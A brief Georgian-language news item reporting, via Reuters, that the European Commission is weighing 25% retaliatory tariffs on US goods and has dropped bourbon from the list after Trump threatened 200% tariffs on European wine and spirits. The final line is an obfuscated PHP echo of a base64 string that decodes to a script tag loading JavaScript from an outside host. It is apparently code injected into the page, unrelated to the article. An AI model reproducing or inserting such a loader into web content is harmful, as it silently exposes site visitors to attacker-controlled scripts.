gorgia
jaluzi

 ევროკომისია აშშ-ს საპასუხოდ 25%-იანი ტარიფების დაწესებას განიხილავს, - ამის შესახებ ინფორმაციას სააგენტო Reuters-ი ევროკომისიის მიერ წევრი ქვეყნებისთვის დასამტკიცებლად გაგზავნილ დოკუმენტზე დაყრდნობით ავრცელებს.

დოკუმენტის თანახმად, აშშ-დან ევროკავშირში იმპორტირებულ ზოგიერთ საქონელზე ტარიფები 16 მაისიდან ამოქმედდება, ხოლო ზოგიერთზე 1-ელი დეკემბრიდან.
Reuters-ის ცნობით, სიიდან ამოღებულია „ბურბონი“, მას შემდეგ, რაც აშშ-ის პრეზიდენტი, დონალდ ტრამპი ევროკავშირს აშშ-ში იმპორტირებულ ევროპულ ღვინოსა და ალკოჰოლურ სასმელებზე 200%-იანი ტარიფებით დაემუქრა, თუ ევროპა „ბურბონზე“ თავდაპირველად გამოცხადებულ 50%-იან ტარიფებს დააწესებდა.
ევროკავშირის წევრი ქვეყნები ევროკომისიის წინადადებას კენჭს 9 აპრილს უყრიან.
120
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");